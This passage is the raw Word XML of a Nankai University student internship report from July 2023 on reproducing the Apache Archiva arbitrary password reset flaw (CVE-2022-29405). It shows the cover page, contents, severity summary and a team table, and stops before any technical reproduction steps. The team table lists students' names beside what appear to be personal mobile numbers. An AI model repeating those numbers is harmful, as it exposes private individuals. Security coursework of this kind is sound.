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ajorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p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hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p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hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   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pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:firstLine="480"/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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月21日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc28487" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28487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"_Toc7481" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7481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"_Toc24528" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划（25分）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11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"_Toc13939" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员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11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"_Toc3137" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象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11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"_Toc7909" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段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11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"_Toc1860" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级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"_Toc6133" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）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1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"_Toc18532" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避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1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"_Toc4033" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法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1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"_Toc28445" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具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"_Toc12892" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4. 漏洞复现结果（25分）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1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"_Toc32666" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC插件编写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1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc25120" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学实习实训第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>组的安全人员采用科学的漏洞复现步骤于2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月18日至2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月20日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAns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Apache Archiva任意用户密码重置漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts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本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个,低危漏洞0个。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4714"/>
        <w:gridCol w:w="2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1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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宋体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风险值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" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"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hint="eastAsia" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="471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rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r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Apache Archiva任意用户密码重置漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体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   </w:t>
            </w:r>
            <w:r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（CVE-2022-29405）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi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 w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAns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CVE-2022-29405</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体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59280" cy="185928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/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
          <w:szCs w:val="2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-8890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7910195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5272405" cy="2306320"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7" name="图片 7" descr="1689651452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896514527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宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAns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CVE-2022-29405</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>已由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security@apache.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分配来跟踪漏洞-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>评为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0AD4E"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 严重性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划（25分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256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1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="45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序号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职务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姓名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1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组长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cs="宋体" w:eastAsiaTheme="minorEastAsia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王伯雅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cs="宋体" w:eastAsiaTheme="minorEastAsia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15503567789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2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cs="宋体" w:eastAsiaTheme="minorEastAsia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李佳豪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cs="宋体" w:eastAsiaTheme="minorEastAsia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13191110713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3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cs="宋体" w:eastAsiaTheme="minorEastAsia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刘哲泽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cs="宋体" w:eastAsiaTheme="minorEastAsia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16650717520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4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cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang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钟雨哲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cs="宋体" w:eastAsiaTheme="minorEastAsia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17879630977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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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吴帅达</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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13375663376</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia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="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Apache Archiva任意用户密码重置漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never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4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343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="20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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="20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343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
